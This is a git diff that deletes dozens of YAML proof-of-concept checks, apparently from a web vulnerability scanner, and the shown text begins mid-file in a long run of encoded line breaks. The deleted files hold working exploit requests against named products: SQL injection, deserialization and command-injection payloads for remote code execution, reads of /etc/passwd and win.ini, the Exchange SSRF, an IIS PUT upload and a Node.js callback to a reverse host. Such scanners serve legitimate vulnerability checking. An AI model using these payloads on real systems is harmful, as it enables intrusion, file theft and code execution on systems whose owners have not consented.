0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0
d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion+select+str({{r1}}*{{r2}})&capitalnum=-10 - follow_redirects: true - expression: | - response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) -detail: - author: fuping - links: - - https://news.ssssafe.com/archives/3325 - - https://www.weaver.com.cn/cs/securityDownload.asp \ No newline at end of file diff --git a/WebScan/pocs/ecology-workflowservicexml-2.yml b/WebScan/pocs/ecology-workflowservicexml-2.yml deleted file mode 100644 index 46d2ace..0000000 --- a/WebScan/pocs/ecology-workflowservicexml-2.yml +++ /dev/null 
@@ -1,20 +0,0 @@ -name: poc-yaml-ecology-workflowservicexml -set: - rand1: randomInt(1000, 9999) - rand2: randomInt(1000, 9999) -rules: - - method: POST - path: /services%20/WorkflowServiceXml - headers: - Content-Type: text/xml - cmd: bin/bash -c 'expr {{rand1}} + {{rand2}}' - follow_redirects: false - body: | - <java.util.PriorityQueue serialization="custom"> <unserializable-parents/> <java.util.PriorityQueue> <default> <size>2</size> <comparator class="org.apache.commons.beanutils.BeanComparator"> <property>outputProperties</property> <comparator class="org.apache.commons.collections.comparators.ComparableComparator"/> </comparator> </default> <int>3</int> <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization="custom"> <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> <default> <__name>Pwnr</__name> <__bytecodes> <byte-array>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</byte-array> <byte-array>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</byte-array> </__bytecodes> <__transletIndex>-1</__transletIndex> <__indentNumber>0</__indentNumber> </default> <boolean>false</boolean> </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference="../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"/> </java.util.PriorityQueue> </java.util.PriorityQueue> 2 - expression: | - response.body.bcontains(bytes(string(rand1 + rand2))) -detail: - author: tangshoupu - info: ecology-workflowservicexml-rce - links: - - https://www.anquanke.com/post/id/239865 \ No newline at end of file diff --git a/WebScan/pocs/ecology-workflowservicexml.yml b/WebScan/pocs/ecology-workflowservicexml.yml deleted file mode 100644 index 1e0c50f..0000000 --- a/WebScan/pocs/ecology-workflowservicexml.yml +++ /dev/null 
@@ -1,20 +0,0 @@ -name: poc-yaml-ecology-workflowservicexml -set: - rand1: randomInt(1000, 9999) - rand2: randomInt(1000, 9999) -rules: - - method: POST - path: /services%20/WorkflowServiceXml - follow_redirects: false - headers: - Content-Type: text/xml - cmd: type c:\\windows\\win.ini - body: | - <java.util.PriorityQueue serialization="custom"> <unserializable-parents/> <java.util.PriorityQueue> <default> <size>2</size> <comparator class="org.apache.commons.beanutils.BeanComparator"> <property>outputProperties</property> <comparator class="org.apache.commons.collections.comparators.ComparableComparator"/> </comparator> </default> <int>3</int> <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization="custom"> <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> <default> <__name>Pwnr</__name> <__bytecodes> <byte-array>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</byte-array> <byte-array>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</byte-array> </__bytecodes> <__transletIndex>-1</__transletIndex> <__indentNumber>0</__indentNumber> </default> <boolean>false</boolean> </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference="../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"/> </java.util.PriorityQueue> </java.util.PriorityQueue> 2 - expression: | - response.status == 500 && response.headers["Set-Cookie"].contains("ecology") && response.body.bcontains(b"for 16-bit app support") -detail: - author: tangshoupu - info: ecology-workflowservicexml-rce - links: - - https://www.anquanke.com/post/id/239865 \ No newline at end of file diff --git a/WebScan/pocs/ecshop-cnvd-2020-58823-sqli.yml b/WebScan/pocs/ecshop-cnvd-2020-58823-sqli.yml deleted file mode 100644 index 0b7721c..0000000 --- a/WebScan/pocs/ecshop-cnvd-2020-58823-sqli.yml +++ /dev/null 
@@ -1,13 +0,0 @@ -name: poc-yaml-ecshop-cnvd-2020-58823-sqli -set: - r1: randomInt(40000, 44800) -rules: - - method: POST - path: /delete_cart_goods.php - body: id=0||(updatexml(1,concat(0x7e,(select%20md5({{r1}})),0x7e),1)) - expression: | - response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) -detail: - author: 凉风(http://webkiller.cn/) - links: - - https://mp.weixin.qq.com/s/1t0uglZNoZERMQpXVVjIPw \ No newline at end of file diff --git a/WebScan/pocs/ecshop-rce.yml b/WebScan/pocs/ecshop-rce.yml deleted file mode 100644 index bb9151c..0000000 --- a/WebScan/pocs/ecshop-rce.yml +++ /dev/null @@ -1,17 +0,0 @@ -name: poc-yaml-ecshop-rce -set: - r1: randomInt(40000, 44800) - r2: randomInt(40000, 44800) -rules: - - method: POST - path: /user.php - headers: - Referer: >- - 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca - Content-Type: application/x-www-form-urlencoded - body: action=login&pp123=printf({{r1}}*{{r2}}); - expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) -detail: - author: 凉风(http://webkiller.cn/) - links: - - https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md \ No newline at end of file diff --git a/WebScan/pocs/ecshop-rce2.yml b/WebScan/pocs/ecshop-rce2.yml deleted file mode 100644 index c79f02c..0000000 --- a/WebScan/pocs/ecshop-rce2.yml +++ /dev/null 
@@ -1,17 +0,0 @@ -name: poc-yaml-ecshop-rce -set: - r1: randomInt(40000, 44800) - r2: randomInt(40000, 44800) -rules: - - method: POST - path: /user.php - headers: - Referer: >- - 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953aads - Content-Type: application/x-www-form-urlencoded - body: action=login&pp123=printf({{r1}}*{{r2}}); - expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) -detail: - author: 凉风(http://webkiller.cn/) - links: - - https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md \ No newline at end of file diff --git a/WebScan/pocs/elasticsearch-unauth.yml b/WebScan/pocs/elasticsearch-unauth.yml deleted file mode 100644 index 18b7cd1..0000000 --- a/WebScan/pocs/elasticsearch-unauth.yml +++ /dev/null @@ -1,16 +0,0 @@ -name: poc-yaml-elasticsearch-unauth -rules: - - method: GET - path: / - follow_redirects: false - expression: | - response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"You Know, for Search") - - method: GET - path: /_cat - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"/_cat/master") -detail: - author: p0wd3r - links: - - https://yq.aliyun.com/articles/616757 diff --git a/WebScan/pocs/exchange-cve-2021-26855-ssrf.yml b/WebScan/pocs/exchange-cve-2021-26855-ssrf.yml deleted file mode 100644 index 97a1da6..0000000 --- a/WebScan/pocs/exchange-cve-2021-26855-ssrf.yml +++ /dev/null 
@@ -1,14 +0,0 @@ -name: poc-yaml-exchange-cve-2021-26855-ssrf -rules: - - method: GET - path: /owa/auth/x.js - headers: - Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3; - follow_redirects: false - expression: | - "X-CalculatedBETarget" in response.headers && response.headers["X-CalculatedBETarget"].icontains("localhost") -detail: - author: sharecast - Affected Version: "Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010" - links: - - https://github.com/microsoft/CSS-Exchange/blob/main/Security/http-vuln-cve2021-26855.nse \ No newline at end of file diff --git a/WebScan/pocs/eyou-rce.yml b/WebScan/pocs/eyou-rce.yml deleted file mode 100644 index 3e6bfcc..0000000 --- a/WebScan/pocs/eyou-rce.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-eyou-rce -set: - r1: randomInt(800000000, 1000000000) - r2: randomInt(800000000, 1000000000) -rules: - - method: POST - path: /webadm/?q=moni_detail.do&action=gragh - headers: - Content-Type: application/x-www-form-urlencoded - body: type='|expr {{r1}} + {{r2}}||' - expression: response.body.bcontains(bytes(string(r1 + r2))) -detail: - author: jingling(https://github.com/shmilylty) - links: - - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g \ No newline at end of file diff --git a/WebScan/pocs/f5-tmui-cve-2020-5902-rce.yml b/WebScan/pocs/f5-tmui-cve-2020-5902-rce.yml deleted file mode 100644 index 100a2ad..0000000 --- a/WebScan/pocs/f5-tmui-cve-2020-5902-rce.yml +++ /dev/null 
@@ -1,16 +0,0 @@ -name: poc-yaml-f5-tmui-cve-2020-5902-rce -rules: - - method: POST - path: >- - /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp - headers: - Content-Type: application/x-www-form-urlencoded - body: fileName=%2Fetc%2Ff5-release - follow_redirects: true - expression: | - response.status == 200 && response.body.bcontains(b"BIG-IP release") -detail: - author: Jing Ling - links: - - https://support.f5.com/csp/article/K52145254 - - https://github.com/rapid7/metasploit-framework/pull/13807/files diff --git a/WebScan/pocs/fangweicms-sqli.yml b/WebScan/pocs/fangweicms-sqli.yml deleted file mode 100644 index a9df0f1..0000000 --- a/WebScan/pocs/fangweicms-sqli.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: poc-yaml-fangweicms-sqli -set: - rand: randomInt(200000000, 210000000) -rules: - - method: GET - path: /index.php?m=Goods&a=showcate&id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5({{rand}})%29%23 - expression: | - response.body.bcontains(bytes(md5(string(rand)))) -detail: - author: Rexus - Affected Version: "4.3" - links: - - http://www.wujunjie.net/index.php/2015/08/02/%E6%96%B9%E7%BB%B4%E5%9B%A2%E8%B4%AD4-3%E6%9C%80%E6%96%B0%E7%89%88sql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/ diff --git a/WebScan/pocs/finereport-v8-arbitrary-file-read.yml b/WebScan/pocs/finereport-v8-arbitrary-file-read.yml deleted file mode 100644 index 7cd9f41..0000000 --- a/WebScan/pocs/finereport-v8-arbitrary-file-read.yml +++ /dev/null 
@@ -1,11 +0,0 @@ -name: poc-yaml-finereport-v8-arbitrary-file-read -rules: - - method: GET - path: /WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"rootManagerName") && response.body.bcontains(b"CDATA") -detail: - author: Facker007(https://github.com/Facker007) - links: - - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%20v8.0%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CNVD-2018-04757.html?h=%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8 diff --git a/WebScan/pocs/flir-ax8-file-read.yml b/WebScan/pocs/flir-ax8-file-read.yml deleted file mode 100644 index 6a77cc7..0000000 --- a/WebScan/pocs/flir-ax8-file-read.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-flir-ax8-file-read -rules: - - method: GET - path: "/download.php?file=/etc/passwd" - follow_redirects: false - expression: | - response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) -detail: - author: Print1n(http://print1n.top) - links: - - https://juejin.cn/post/6961370156484263972 \ No newline at end of file diff --git a/WebScan/pocs/gitlab-cnvd-2021-14193-infoleak.yml b/WebScan/pocs/gitlab-cnvd-2021-14193-infoleak.yml deleted file mode 100644 index 8fe94ce..0000000 --- a/WebScan/pocs/gitlab-cnvd-2021-14193-infoleak.yml +++ /dev/null 
@@ -1,15 +0,0 @@ -name: poc-yaml-gitlab-cnvd-2021-14193-infoleak -rules: - - method: POST - path: /api/graphql - headers: - Content-Type: application/json - body: >- - {"query":"{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }","variables":null,"operationName":null} - follow_redirects: false - expression: response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(bytes("avatarUrl")) -detail: - author: 说书人(http://python.vin/) - links: - - https://www.cnvd.org.cn/flaw/show/CNVD-2021-14193 - - https://gitlab.com/gitlab-org/gitlab/-/issues/244275 \ No newline at end of file diff --git a/WebScan/pocs/h3c-secparh-any-user-login.yml b/WebScan/pocs/h3c-secparh-any-user-login.yml deleted file mode 100644 index d9f265f..0000000 --- a/WebScan/pocs/h3c-secparh-any-user-login.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-h3c-secparh-any-user-login -rules: - - method: GET - path: "/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin" - expression: | - response.status == 200 && ("错误的id".bmatches(response.body) || "审计管理员".bmatches(response.body)) -detail: - author: Print1n(https://print1n.top) - links: - - https://www.pwnwiki.org/index.php?title=H3C_SecParh%E5%A0%A1%E5%A3%98%E6%A9%9F_get_detail_view.php_%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B6%E7%99%BB%E9%8C%84%E6%BC%8F%E6%B4%9E \ No newline at end of file diff --git a/WebScan/pocs/hikvision-cve-2017-7921.yml b/WebScan/pocs/hikvision-cve-2017-7921.yml deleted file mode 100644 index 78e8440..0000000 --- a/WebScan/pocs/hikvision-cve-2017-7921.yml +++ /dev/null 
@@ -1,11 +0,0 @@ -name: poc-yaml-hikvision-cve-2017-7921 -rules: - - method: GET - path: /system/deviceInfo?auth=YWRtaW46MTEK - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"") && response.headers["content-type"] == "application/xml" -detail: - author: whwlsfb(https://github.com/whwlsfb) - links: - - https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html \ No newline at end of file diff --git a/WebScan/pocs/iis6.0-put.yml b/WebScan/pocs/iis6.0-put.yml deleted file mode 100644 index de6c485..0000000 --- a/WebScan/pocs/iis6.0-put.yml +++ /dev/null @@ -1,21 +0,0 @@ -name: poc-yaml-iis-put-getshell -set: - filename: randomLowercase(6) - fileContent: randomLowercase(6) - -rules: - - method: PUT - path: /{(unknown)}.txt - body: | - {{fileContent}} - expression: | - response.status == 201 - - method: GET - path: /{(unknown)}.txt - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(bytes(fileContent)) -detail: - author: Cannae(github.com/thunderbarca) - links: - - https://www.cnblogs.com/-mo-/p/11295400.html \ No newline at end of file diff --git a/WebScan/pocs/jboss-cve-2010-1871.yml b/WebScan/pocs/jboss-cve-2010-1871.yml deleted file mode 100644 index c691a25..0000000 --- a/WebScan/pocs/jboss-cve-2010-1871.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-jboss-cve-2010-1871 -set: - r1: randomInt(8000000, 10000000) - r2: randomInt(8000000, 10000000) -rules: - - method: GET - path: /admin-console/index.seam?actionOutcome=/pwn.xhtml%3fpwned%3d%23%7b{{r1}}*{{r2}}%7d - follow_redirects: false - expression: | - response.status == 302 && response.headers["location"].contains(string(r1 * r2)) -detail: - author: fuping - links: - - http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1871 \ No newline at end of file 
diff --git a/WebScan/pocs/jboss-unauth.yml b/WebScan/pocs/jboss-unauth.yml deleted file mode 100644 index 5fbe218..0000000 --- a/WebScan/pocs/jboss-unauth.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-jboss-unauth -rules: - - method: GET - path: /jmx-console/ - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"jboss.management.local") && response.body.bcontains(b"jboss.web") -detail: - author: FiveAourThe(https://github.com/FiveAourThe) - links: - - https://xz.aliyun.com/t/6103 \ No newline at end of file diff --git a/WebScan/pocs/jenkins-cve-2018-1000861-rce.yml b/WebScan/pocs/jenkins-cve-2018-1000861-rce.yml deleted file mode 100644 index 1eb3e2b..0000000 --- a/WebScan/pocs/jenkins-cve-2018-1000861-rce.yml +++ /dev/null @@ -1,14 +0,0 @@ -name: poc-yaml-jenkins-cve-2018-1000861-rce -set: - rand: randomLowercase(4) -rules: - - method: GET - path: >- - /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27{{rand}}%27,%20version=%271%27)%0aimport%20Payload; - follow_redirects: false - expression: >- - response.status == 200 && response.body.bcontains(bytes("package#" + rand)) -detail: - author: p0wd3r - links: - - https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861 diff --git a/WebScan/pocs/jenkins-unauthorized-access.yml b/WebScan/pocs/jenkins-unauthorized-access.yml deleted file mode 100644 index dabe88b..0000000 --- a/WebScan/pocs/jenkins-unauthorized-access.yml +++ /dev/null 
@@ -1,21 +0,0 @@ -name: poc-yaml-jenkins-unauthorized-access -set: - r1: randomInt(1000, 9999) - r2: randomInt(1000, 9999) -rules: - - method: GET - path: /script - follow_redirects: false - expression: response.status == 200 - search: | - "Jenkins-Crumb", "(?P.+?)"\); - - method: POST - path: /script - body: | - script=printf%28%27{{r1}}%25%25{{r2}}%27%29%3B&Jenkins-Crumb={{var}}&Submit=%E8%BF%90%E8%A1%8C - expression: response.status == 200 && response.body.bcontains(bytes(string(r1) + "%" + string(r2))) -detail: - author: MrP01ntSun(https://github.com/MrPointSun) - links: - - https://www.cnblogs.com/yuzly/p/11255609.html - - https://blog.51cto.com/13770310/2156663 diff --git a/WebScan/pocs/jumpserver-unauth-rce.yml b/WebScan/pocs/jumpserver-unauth-rce.yml deleted file mode 100644 index 041832d..0000000 --- a/WebScan/pocs/jumpserver-unauth-rce.yml +++ /dev/null @@ -1,21 +0,0 @@ -name: poc-yaml-jumpserver-unauth-rce -set: - r1: randomLowercase(5) -rules: - - method: GET - path: /api/v1/authentication/connection-token/ - follow_redirects: false - expression: | - response.status == 401 && response.content_type.contains("application/json") && response.body.bcontains(b"not_authenticated") - - method: GET - path: /api/v1/authentication/connection-token/?user-only={{r1}} - follow_redirects: false - expression: | - response.status == 404 && response.content_type.contains("application/json") && response.body.bcontains(b"\"\"") -detail: - author: mvhz81 - info: jumpserver unauth read logfile + jumpserver rce - links: - - https://s.tencent.com/research/bsafe/1228.html - - https://mp.weixin.qq.com/s/KGRU47o7JtbgOC9xwLJARw - - https://github.com/jumpserver/jumpserver/releases/download/v2.6.2/jms_bug_check.sh diff --git a/WebScan/pocs/jumpserver-unauth-rce2.yml b/WebScan/pocs/jumpserver-unauth-rce2.yml deleted file mode 100644 index 353329d..0000000 --- a/WebScan/pocs/jumpserver-unauth-rce2.yml +++ /dev/null 
@@ -1,21 +0,0 @@ -name: poc-yaml-jumpserver-unauth-rce -set: - r1: randomLowercase(5) -rules: - - method: GET - path: /api/v1/users/connection-token/ - follow_redirects: false - expression: | - response.status == 401 && response.content_type.contains("application/json") && response.body.bcontains(b"not_authenticated") - - method: GET - path: /api/v1/users/connection-token/?user-only={{r1}} - follow_redirects: false - expression: | - response.status == 404 && response.content_type.contains("application/json") && response.body.bcontains(b"\"\"") -detail: - author: mvhz81 - info: jumpserver unauth read logfile + jumpserver rce - links: - - https://s.tencent.com/research/bsafe/1228.html - - https://mp.weixin.qq.com/s/KGRU47o7JtbgOC9xwLJARw - - https://github.com/jumpserver/jumpserver/releases/download/v2.6.2/jms_bug_check.sh diff --git a/WebScan/pocs/kingsoft-v8-default-password.yml b/WebScan/pocs/kingsoft-v8-default-password.yml deleted file mode 100644 index 6835390..0000000 --- a/WebScan/pocs/kingsoft-v8-default-password.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-kingsoft-v8-default-password -rules: - - method: POST - path: /inter/ajax.php?cmd=get_user_login_cmd - body: "{\"get_user_login_cmd\":{\"name\":\"admin\",\"password\":\"21232f297a57a5a743894a0e4a801fc3\"}}" - follow_redirects: true - expression: | - response.status == 200 && response.body.bcontains(b"ADMIN") && response.body.bcontains(b"userSession") -detail: - author: B1anda0(https://github.com/B1anda0) - links: - - https://idc.wanyunshuju.com/aqld/2123.html \ No newline at end of file diff --git a/WebScan/pocs/kingsoft-v8-file-read.yml b/WebScan/pocs/kingsoft-v8-file-read.yml deleted file mode 100644 index 02b3eb0..0000000 --- a/WebScan/pocs/kingsoft-v8-file-read.yml +++ /dev/null 
@@ -1,12 +0,0 @@ -name: poc-yaml-kingsoft-v8-file-read -rules: - - method: GET - path: >- - /htmltopdf/downfile.php?filename=/windows/win.ini - follow_redirects: false - expression: | - response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]")) && response.headers["Content-Type"].contains("application/zip") -detail: - author: kzaopa(https://github.com/kzaopa) - links: - - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/b6f8fbfef46ad1c3f8d5715dd19b00ca875341c2/_book/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E9%87%91%E5%B1%B1/%E9%87%91%E5%B1%B1%20V8%20%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9F%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md diff --git a/WebScan/pocs/landray-oa-custom-jsp-fileread-2.yml b/WebScan/pocs/landray-oa-custom-jsp-fileread-2.yml deleted file mode 100644 index f7d39e7..0000000 --- a/WebScan/pocs/landray-oa-custom-jsp-fileread-2.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-landray-oa-custom-jsp-fileread -rules: - - method: POST - path: /sys/ui/extend/varkind/custom.jsp - body: var={"body":{"file":"file:///c://windows/win.ini"}} - expression: | - response.status == 200 && response.body.bcontains(b"for 16-bit app support") -detail: - author: B1anda0(https://github.com/B1anda0) - links: - - https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw \ No newline at end of file diff --git a/WebScan/pocs/landray-oa-custom-jsp-fileread.yml b/WebScan/pocs/landray-oa-custom-jsp-fileread.yml deleted file mode 100644 index e513a88..0000000 --- a/WebScan/pocs/landray-oa-custom-jsp-fileread.yml +++ /dev/null 
@@ -1,11 +0,0 @@ -name: poc-yaml-landray-oa-custom-jsp-fileread -rules: - - method: POST - path: /sys/ui/extend/varkind/custom.jsp - body: var={"body":{"file":"file:///etc/passwd"}} - expression: | - response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) -detail: - author: B1anda0(https://github.com/B1anda0) - links: - - https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw \ No newline at end of file diff --git a/WebScan/pocs/lanproxy-cve-2021-3019-lfi.yml b/WebScan/pocs/lanproxy-cve-2021-3019-lfi.yml deleted file mode 100644 index b4c8a72..0000000 --- a/WebScan/pocs/lanproxy-cve-2021-3019-lfi.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-lanproxy-cve-2021-3019-lfi -rules: - - method: GET - path: "/../conf/config.properties" - expression: | - response.status == 200 && response.body.bcontains(bytes(string(b"config.admin.username"))) && response.body.bcontains(bytes(string(b"config.admin.password"))) && response.content_type.contains("application/octet-stream") -detail: - author: pa55w0rd(www.pa55w0rd.online/) - Affected Version: "lanproxy 0.1" - links: - - https://github.com/ffay/lanproxy/issues/152 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019 diff --git a/WebScan/pocs/laravel-debug-info-leak.yml b/WebScan/pocs/laravel-debug-info-leak.yml deleted file mode 100644 index aa5610e..0000000 --- a/WebScan/pocs/laravel-debug-info-leak.yml +++ /dev/null 
@@ -1,11 +0,0 @@ -name: poc-yaml-laravel-debug-info-leak -rules: - - method: POST - path: / - follow_redirects: false - expression: > - response.status == 405 && response.body.bcontains(b"MethodNotAllowedHttpException") && response.body.bcontains(b"Environment & details") && (response.body.bcontains(b"vendor\\laravel\\framework\\src\\Illuminate\\Routing\\RouteCollection.php") || response.body.bcontains(b"vendor/laravel/framework/src/Illuminate/Routing/RouteCollection.php")) -detail: - author: Dem0ns (https://github.com/dem0ns) - links: - - https://github.com/dem0ns/improper/tree/master/laravel/5_debug diff --git a/WebScan/pocs/laravel-improper-webdir.yml b/WebScan/pocs/laravel-improper-webdir.yml deleted file mode 100644 index d1db0b5..0000000 --- a/WebScan/pocs/laravel-improper-webdir.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-laravel-improper-webdir -rules: - - method: GET - path: /storage/logs/laravel.log - follow_redirects: false - expression: > - response.status == 200 && (response.content_type.contains("plain") || response.content_type.contains("octet-stream")) && (response.body.bcontains(b"vendor\\laravel\\framework") || response.body.bcontains(b"vendor/laravel/framework")) && (response.body.bcontains(b"stacktrace") || response.body.bcontains(b"Stack trace")) -detail: - author: Dem0ns (https://github.com/dem0ns) - links: - - https://github.com/dem0ns/improper diff --git a/WebScan/pocs/mongo-express-cve-2019-10758.yml b/WebScan/pocs/mongo-express-cve-2019-10758.yml deleted file mode 100644 index 6d64293..0000000 --- a/WebScan/pocs/mongo-express-cve-2019-10758.yml +++ /dev/null 
@@ -1,21 +0,0 @@ -name: poc-yaml-mongo-express-cve-2019-10758 -set: - reverse: newReverse() - reverseURL: reverse.url -rules: - - method: POST - path: /checkValid - headers: - Authorization: Basic YWRtaW46cGFzcw== - body: >- - document=this.constructor.constructor('return process')().mainModule.require('http').get('{{reverseURL}}') - follow_redirects: true - expression: > - reverse.wait(5) -detail: - vulnpath: '/checkValid' - author: fnmsd(https://github.com/fnmsd) - description: 'Mongo Express CVE-2019-10758 Code Execution' - links: - - https://github.com/masahiro331/CVE-2019-10758 - - https://www.twilio.com/blog/2017/08/http-requests-in-node-js.html \ No newline at end of file diff --git a/WebScan/pocs/netentsec-ngfw-rce.yml b/WebScan/pocs/netentsec-ngfw-rce.yml deleted file mode 100644 index bff8b28..0000000 --- a/WebScan/pocs/netentsec-ngfw-rce.yml +++ /dev/null @@ -1,19 +0,0 @@ -name: poc-yaml-netentsec-ngfw-rce -set: - r1: randomLowercase(4) - r2: randomLowercase(4) - r3: randomInt(800000000, 1000000000) - r4: randomInt(800000000, 1000000000) -rules: - - method: POST - path: /directdata/direct/router - body: >- - {"action":"SSLVPN_Resource", "method":"deleteImage", "data":[{"data":["/var/www/html/{{r1}};expr {{r3}} + {{r4}} > /var/www/html/{{r2}}"]}], "type":"rpc", "tid":17, "f8839p7rqtj":"="} - expression: response.status == 200 - - method: GET - path: /{{r2}} - expression: response.status == 200 && response.body.bcontains(bytes(string(r3 + r4))) -detail: - 